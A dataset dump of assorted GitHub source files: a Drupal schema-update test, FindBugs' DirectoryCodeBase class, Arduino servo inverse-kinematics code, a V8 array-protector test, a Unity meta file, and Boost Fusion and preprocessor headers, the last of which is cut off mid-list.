text
stringlengths 2
99.9k
| meta
dict |
---|---|
<?php
namespace Drupal\Tests\system\Functional\UpdateSystem;
use Drupal\Core\Database\Database;
use Drupal\Core\Url;
use Drupal\Tests\BrowserTestBase;
use Drupal\Tests\RequirementsPageTrait;
/**
* Tries to update a module which has no pre-existing schema.
*
* @group Update
* @group legacy
*/
class NoPreExistingSchemaUpdateTest extends BrowserTestBase {
use RequirementsPageTrait;
protected function setUp() {
parent::setUp();
$connection = Database::getConnection();
// Enable the update_test_no_preexisting module by altering the
// core.extension configuration directly, so that the schema version
// information is missing.
$extensions = $connection->select('config')
->fields('config', ['data'])
->condition('name', 'core.extension')
->execute()
->fetchField();
$extensions = unserialize($extensions);
$connection->update('config')
->fields([
'data' => serialize(array_merge_recursive($extensions, ['module' => ['update_test_no_preexisting' => 0]])),
])
->condition('name', 'core.extension')
->execute();
}
/**
* Test the system module updates with no dependencies installed.
*/
public function testNoPreExistingSchema() {
$schema = \Drupal::keyValue('system.schema')->getAll();
$this->assertArrayNotHasKey('update_test_no_preexisting', $schema);
$this->assertFalse(\Drupal::state()->get('update_test_no_preexisting_update_8001', FALSE));
$update_url = Url::fromRoute('system.db_update');
require_once $this->root . '/core/includes/update.inc';
// The site might be broken at the time so logging in using the UI might
// not work, so we use the API itself.
$this->writeSettings([
'settings' => [
'update_free_access' => (object) [
'value' => TRUE,
'required' => TRUE,
],
],
]);
$this->drupalGet($update_url);
$this->updateRequirementsProblem();
$schema = \Drupal::keyValue('system.schema')->getAll();
$this->assertArrayHasKey('update_test_no_preexisting', $schema);
$this->assertEquals('8001', $schema['update_test_no_preexisting']);
// The schema version has been fixed, but the update was never run.
$this->assertFalse(\Drupal::state()->get('update_test_no_preexisting_update_8001', FALSE));
$this->assertSession()->pageTextContains('Schema information for module update_test_no_preexisting was missing from the database. You should manually review the module updates and your database to check if any updates have been skipped up to, and including, update_test_no_preexisting_update_8001().');
}
}
| {
"pile_set_name": "Github"
} |
/*
* FindBugs - Find Bugs in Java programs
* Copyright (C) 2006, University of Maryland
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
package edu.umd.cs.findbugs.classfile.impl;
import java.io.*;
import java.util.Iterator;
import java.util.LinkedList;
import edu.umd.cs.findbugs.RecursiveFileSearch;
import edu.umd.cs.findbugs.classfile.ICodeBaseEntry;
import edu.umd.cs.findbugs.classfile.ICodeBaseIterator;
import edu.umd.cs.findbugs.classfile.ICodeBaseLocator;
/**
* IScannableCodeBase implementation to read resources from a filesystem
* directory.
*
* @author David Hovemeyer
*/
public class DirectoryCodeBase extends AbstractScannableCodeBase {
private class DirectoryCodeBaseIterator implements ICodeBaseIterator {
Iterator<String> fileNameIterator = rfs.fileNameIterator();
/*
* (non-Javadoc)
*
* @see edu.umd.cs.findbugs.classfile.ICodeBaseIterator#hasNext()
*/
@Override
public boolean hasNext() throws InterruptedException {
return fileNameIterator.hasNext();
}
/*
* (non-Javadoc)
*
* @see edu.umd.cs.findbugs.classfile.ICodeBaseIterator#next()
*/
@Override
public ICodeBaseEntry next() throws InterruptedException {
final String fileName = fileNameIterator.next();
// Make the filename relative to the directory
String resourceName = getResourceName(fileName);
// Update last modified time
File file = new File(fileName);
long modTime = file.lastModified();
addLastModifiedTime(modTime);
return new DirectoryCodeBaseEntry(DirectoryCodeBase.this, resourceName);
}
}
private File directory;
private RecursiveFileSearch rfs;
private boolean searchPerformed;
/**
* Constructor.
*
* @param codeBaseLocator
* the codebase locator for this codebase
* @param directory
* the filesystem directory
*/
public DirectoryCodeBase(ICodeBaseLocator codeBaseLocator, File directory) {
super(codeBaseLocator);
if (!directory.isDirectory()) {
throw new IllegalArgumentException();
}
this.directory = directory;
this.rfs = new RecursiveFileSearch(directory.getPath(), pathname -> true);
this.searchPerformed = false;
}
/*
* (non-Javadoc)
*
* @see edu.umd.cs.findbugs.classfile.IScannableCodeBase#iterator()
*/
@Override
public ICodeBaseIterator iterator() throws InterruptedException {
if (!searchPerformed) {
rfs.search();
searchPerformed = true;
}
return new DirectoryCodeBaseIterator();
}
/*
* (non-Javadoc)
*
* @see edu.umd.cs.findbugs.classfile.ICodeBase#getPathName()
*/
@Override
public String getPathName() {
return directory.getPath();
}
/*
* (non-Javadoc)
*
* @see edu.umd.cs.findbugs.classfile.ICodeBase#close()
*/
@Override
public void close() {
// Nothing to do
}
/*
* (non-Javadoc)
*
* @see
* edu.umd.cs.findbugs.classfile.ICodeBase#lookupResource(java.lang.String)
*/
@Override
public ICodeBaseEntry lookupResource(String resourceName) {
// Translate resource name, in case a resource name
// has been overridden and the resource is being accessed
// using the overridden name.
resourceName = translateResourceName(resourceName);
File file = getFullPathOfResource(resourceName);
if (!file.exists()) {
return null;
}
return new DirectoryCodeBaseEntry(this, resourceName);
}
InputStream openFile(String resourceName) throws FileNotFoundException, IOException {
File path = getFullPathOfResource(resourceName);
return new BufferedInputStream(new FileInputStream(path));
}
/**
* Get the full path of given resource.
*/
File getFullPathOfResource(String resourceName) {
return new File(directory, resourceName);
}
/**
* Get the resource name given a full filename.
*
* @param fileName
* the full filename (which must be inside the directory)
* @return the resource name (i.e., the filename with the directory stripped
* off)
*/
String getResourceName(String fileName) {
// FIXME: there is probably a more robust way to do this
// Strip off the directory part.
String dirPath = directory.getPath();
if (!fileName.startsWith(dirPath)) {
throw new IllegalStateException("Filename " + fileName + " not inside directory " + dirPath);
}
// The problem here is that we need to take the relative part of the
// filename
// and break it into components that we can then reconstruct into
// a resource name (using '/' characters to separate the components).
// Unfortunately, the File class does not make this task particularly
// easy.
String relativeFileName = fileName.substring(dirPath.length());
File file = new File(relativeFileName);
LinkedList<String> partList = new LinkedList<>();
do {
partList.addFirst(file.getName());
} while ((file = file.getParentFile()) != null);
StringBuilder buf = new StringBuilder();
for (String part : partList) {
if (buf.length() > 0) {
buf.append('/');
}
buf.append(part);
}
return buf.toString();
}
/*
* (non-Javadoc)
*
* @see java.lang.Object#toString()
*/
@Override
public String toString() {
return directory.getPath();
}
}
| {
"pile_set_name": "Github"
} |
float XPosition[2] = {80, 80}; //place x positions
float ZPosition[2] = {35,60}; //place z positions
float X0; //used to enter inside function calcul angles
float Z0; //used to enter inside function calcul angles
int pulsewidth1;
int pulsewidth2;
void setup() {
Serial.begin (115200);
Serial.println ("#0 P680 #3 P2013 #4 P1500 #11 P1500 #12 P2013 #15 P680 T800" ); //Set servos to starting position
Serial.println ("#16 P680 #19 P2013 #20 P1500 #27 P1500 #28 P2013 #31 P680 T800");
delay (2000);
}
void loop() {
for (int i = 0; i <= 1; i++){
X0 = XPosition[i];
Z0 = ZPosition[i];
calculAngles (X0, Z0); // Calls function Calcul angles
moveservo (0, pulsewidth1, 800); // Calls function to move the servo
moveservo (15, pulsewidth1, 800);
moveservo (16, pulsewidth1, 800);
moveservo (31, pulsewidth1, 800);
moveservo (3, pulsewidth2, 800);
moveservo (12, pulsewidth2, 800);
moveservo (19, pulsewidth2, 800);
moveservo (28, pulsewidth2, 800);
delay (800);
}
}
void calculAngles(float X0, float Y0) {
const float a = 70; //this value is known (femur)
const float b = 111; //this value is known (tibia)
float hypo;
float alpha;
const float pi=3.141592653;
float beta;
float gamma;
float delta;
float epsilon;
float roundBeta; //to round value before convert from float to int
float roundEpsilon;
hypo = sqrt((sq(X0) + sq(Z0)));
alpha = (acos((sq(a)+sq(hypo)-sq(b))/(2*a*hypo)))*180/pi; // cosines law in degrees
gamma = (atan2(Z0,X0))*180/pi;
beta = 90 - alpha + gamma;
Serial.print ("Beta = "); // prints this text in the serial monitor
Serial.println (beta); // prints beta value in serial monitor
delta = (acos((sq(a)+sq(b)-sq(hypo))/(2*a*b)))*180/pi;
epsilon = 180 - delta;
Serial.print ("Epsilon = ");
Serial.println(epsilon);
roundBeta = lround((beta*11)+560); // convert angle to pulsewidth and rounds it
roundEpsilon = lround ((epsilon*11)+560);
pulsewidth1 = (int)roundBeta;
pulsewidth2 = (int)roundEpsilon;
}
void moveservo (int servo, int positions, int time) {
Serial.print ("#");
Serial.print (servo);
Serial.print (" P");
Serial.print (positions);
Serial.print (" T");
Serial.println (time);
}
| {
"pile_set_name": "Github"
} |
// Copyright 2017 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// Flags: --allow-natives-syntax --no-stress-opt
function f(a, i, v) { a[i] = v; }
f("make it generic", 0, 0);
(function TestIsConcatSpreadableProtector() {
var o = {length: 1, '0': 99};
%OptimizeObjectForAddingMultipleProperties(o, 0);
f(o, Symbol.isConcatSpreadable, true);
assertEquals([99], [].concat(o));
})();
(function TestSpeciesProtector() {
function MyArray() {}
assertTrue(%ArraySpeciesProtector());
f(Array.prototype, "constructor", MyArray);
assertFalse(%ArraySpeciesProtector());
})();
| {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: f1b13d7a80660504a858ea24cfa418c6
ShaderImporter:
userData:
| {
"pile_set_name": "Github"
} |
/*=============================================================================
Copyright (c) 2001-2011 Joel de Guzman
Copyright (c) 2007 Dan Marsden
Copyright (c) 2009-2010 Christopher Schmidt
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
This is an auto-generated file. Do not edit!
==============================================================================*/
# if BOOST_WORKAROUND (BOOST_MSVC, < 1500)
# define BOOST_FUSION_FOLD_IMPL_ENABLER(T) void
# else
# define BOOST_FUSION_FOLD_IMPL_ENABLER(T) typename T::type
# endif
namespace boost { namespace fusion
{
namespace detail
{
template<int SeqSize, typename It, typename State, typename F, typename = void
# if BOOST_WORKAROUND (BOOST_MSVC, < 1500)
, bool = SeqSize == 0
# endif
>
struct result_of_it_fold
{};
template<typename It, typename State, typename F>
struct result_of_it_fold<0,It,State,F
, typename boost::enable_if_has_type<BOOST_FUSION_FOLD_IMPL_ENABLER(State)>::type
# if BOOST_WORKAROUND (BOOST_MSVC, < 1500)
, true
# endif
>
{
typedef typename State::type type;
};
template<int SeqSize, typename It, typename State, typename F>
struct result_of_it_fold<SeqSize,It,State,F
, typename boost::enable_if_has_type<
# if BOOST_WORKAROUND (BOOST_MSVC, >= 1500)
typename boost::disable_if_c<SeqSize == 0, State>::type::type
# else
BOOST_FUSION_FOLD_IMPL_ENABLER(State)
# endif
>::type
# if BOOST_WORKAROUND (BOOST_MSVC, < 1500)
, false
# endif
>
: result_of_it_fold<
SeqSize-1
, typename result_of::next<It>::type
, boost::result_of<
F(
typename add_reference<typename State::type>::type,
typename fusion::result_of::deref<It const>::type
)
>
, F
>
{};
template<typename It, typename State, typename F>
BOOST_CONSTEXPR BOOST_FUSION_GPU_ENABLED
inline typename result_of_it_fold<
0
, It
, State
, F
>::type
it_fold(mpl::int_<0>, It const&, typename State::type state, F&)
{
return state;
}
template<typename It, typename State, typename F, int SeqSize>
BOOST_CONSTEXPR BOOST_FUSION_GPU_ENABLED
inline typename lazy_enable_if_c<
SeqSize != 0
, result_of_it_fold<
SeqSize
, It
, State
, F
>
>::type
it_fold(mpl::int_<SeqSize>, It const& it, typename State::type state, F& f)
{
return it_fold<
typename result_of::next<It>::type
, boost::result_of<
F(
typename add_reference<typename State::type>::type,
typename fusion::result_of::deref<It const>::type
)
>
, F
>(
mpl::int_<SeqSize-1>()
, fusion::next(it)
, f(state, fusion::deref(it))
, f
);
}
template<typename Seq, typename State, typename F
, bool = traits::is_sequence<Seq>::value
, bool = traits::is_segmented<Seq>::value>
struct result_of_fold
{};
template<typename Seq, typename State, typename F>
struct result_of_fold<Seq, State, F, true, false>
: result_of_it_fold<
result_of::size<Seq>::value
, typename result_of::begin<Seq>::type
, add_reference<State>
, F
>
{};
template<typename Seq, typename State, typename F>
BOOST_CONSTEXPR BOOST_FUSION_GPU_ENABLED
inline typename result_of_fold<Seq, State, F>::type
fold(Seq& seq, State& state, F& f)
{
return it_fold<
typename result_of::begin<Seq>::type
, add_reference<State>
, F
>(
typename result_of::size<Seq>::type()
, fusion::begin(seq)
, state
, f
);
}
}
namespace result_of
{
template<typename Seq, typename State, typename F>
struct fold
: detail::result_of_fold<Seq, State, F>
{};
}
template<typename Seq, typename State, typename F>
BOOST_CONSTEXPR BOOST_FUSION_GPU_ENABLED
inline typename result_of::fold<
Seq
, State const
, F
>::type
fold(Seq& seq, State const& state, F f)
{
return detail::fold<Seq, State const, F>(seq, state, f);
}
template<typename Seq, typename State, typename F>
BOOST_CONSTEXPR BOOST_FUSION_GPU_ENABLED
inline typename result_of::fold<
Seq const
, State const
, F
>::type
fold(Seq const& seq, State const& state, F f)
{
return detail::fold<Seq const, State const, F>(seq, state, f);
}
template<typename Seq, typename State, typename F>
BOOST_CONSTEXPR BOOST_FUSION_GPU_ENABLED
inline typename result_of::fold<
Seq
, State
, F
>::type
fold(Seq& seq, State& state, F f)
{
return detail::fold<Seq, State, F>(seq, state, f);
}
template<typename Seq, typename State, typename F>
BOOST_CONSTEXPR BOOST_FUSION_GPU_ENABLED
inline typename result_of::fold<
Seq const
, State
, F
>::type
fold(Seq const& seq, State& state, F f)
{
return detail::fold<Seq const, State, F>(seq, state, f);
}
}}
| {
"pile_set_name": "Github"
} |
# /* Copyright (C) 2001
# * Housemarque Oy
# * http://www.housemarque.com
# *
# * Distributed under the Boost Software License, Version 1.0. (See
# * accompanying file LICENSE_1_0.txt or copy at
# * http://www.boost.org/LICENSE_1_0.txt)
# */
#
# /* Revised by Paul Mensonides (2002) */
#
# /* See http://www.boost.org for most recent version. */
#
# ifndef BOOST_PREPROCESSOR_CONTROL_WHILE_HPP
# define BOOST_PREPROCESSOR_CONTROL_WHILE_HPP
#
# include <boost/preprocessor/cat.hpp>
# include <boost/preprocessor/config/config.hpp>
# include <boost/preprocessor/debug/error.hpp>
# include <boost/preprocessor/detail/auto_rec.hpp>
# include <boost/preprocessor/list/fold_left.hpp>
# include <boost/preprocessor/list/fold_right.hpp>
# include <boost/preprocessor/logical/bitand.hpp>
#
# /* BOOST_PP_WHILE */
#
# if 0
# define BOOST_PP_WHILE(pred, op, state)
# endif
#
# define BOOST_PP_WHILE BOOST_PP_CAT(BOOST_PP_WHILE_, BOOST_PP_AUTO_REC(BOOST_PP_WHILE_P, 256))
#
# if BOOST_PP_CONFIG_FLAGS() & BOOST_PP_CONFIG_EDG()
# define BOOST_PP_WHILE_P(n) BOOST_PP_BITAND(BOOST_PP_CAT(BOOST_PP_WHILE_CHECK_, BOOST_PP_WHILE_ ## n(BOOST_PP_WHILE_F, BOOST_PP_NIL, BOOST_PP_NIL)), BOOST_PP_BITAND(BOOST_PP_CAT(BOOST_PP_LIST_FOLD_LEFT_CHECK_, BOOST_PP_LIST_FOLD_LEFT_ ## n(BOOST_PP_NIL, BOOST_PP_NIL, BOOST_PP_NIL)), BOOST_PP_CAT(BOOST_PP_LIST_FOLD_RIGHT_CHECK_, BOOST_PP_LIST_FOLD_RIGHT_ ## n(BOOST_PP_NIL, BOOST_PP_NIL, BOOST_PP_NIL))))
# else
# define BOOST_PP_WHILE_P(n) BOOST_PP_BITAND(BOOST_PP_CAT(BOOST_PP_WHILE_CHECK_, BOOST_PP_WHILE_ ## n(BOOST_PP_WHILE_F, BOOST_PP_NIL, BOOST_PP_NIL)), BOOST_PP_CAT(BOOST_PP_LIST_FOLD_LEFT_CHECK_, BOOST_PP_LIST_FOLD_LEFT_ ## n(BOOST_PP_NIL, BOOST_PP_NIL, BOOST_PP_NIL)))
# endif
#
# define BOOST_PP_WHILE_F(d, _) 0
#
# if BOOST_PP_CONFIG_FLAGS() & BOOST_PP_CONFIG_EDG()
# include <boost/preprocessor/control/detail/edg/while.hpp>
# elif BOOST_PP_CONFIG_FLAGS() & BOOST_PP_CONFIG_MSVC()
# include <boost/preprocessor/control/detail/msvc/while.hpp>
# elif BOOST_PP_CONFIG_FLAGS() & BOOST_PP_CONFIG_DMC()
# include <boost/preprocessor/control/detail/dmc/while.hpp>
# else
# include <boost/preprocessor/control/detail/while.hpp>
# endif
#
# define BOOST_PP_WHILE_257(p, o, s) BOOST_PP_ERROR(0x0001)
#
# define BOOST_PP_WHILE_CHECK_BOOST_PP_NIL 1
#
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_1(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_2(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_3(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_4(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_5(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_6(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_7(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_8(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_9(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_10(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_11(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_12(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_13(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_14(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_15(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_16(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_17(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_18(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_19(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_20(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_21(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_22(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_23(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_24(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_25(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_26(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_27(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_28(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_29(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_30(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_31(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_32(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_33(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_34(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_35(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_36(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_37(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_38(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_39(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_40(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_41(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_42(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_43(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_44(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_45(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_46(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_47(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_48(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_49(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_50(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_51(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_52(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_53(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_54(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_55(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_56(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_57(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_58(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_59(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_60(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_61(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_62(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_63(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_64(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_65(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_66(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_67(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_68(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_69(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_70(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_71(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_72(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_73(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_74(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_75(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_76(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_77(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_78(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_79(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_80(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_81(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_82(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_83(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_84(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_85(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_86(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_87(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_88(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_89(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_90(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_91(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_92(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_93(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_94(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_95(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_96(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_97(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_98(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_99(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_100(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_101(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_102(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_103(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_104(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_105(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_106(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_107(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_108(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_109(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_110(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_111(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_112(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_113(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_114(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_115(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_116(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_117(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_118(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_119(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_120(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_121(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_122(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_123(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_124(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_125(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_126(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_127(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_128(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_129(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_130(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_131(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_132(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_133(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_134(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_135(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_136(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_137(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_138(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_139(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_140(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_141(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_142(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_143(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_144(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_145(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_146(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_147(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_148(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_149(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_150(p, o, s) 0
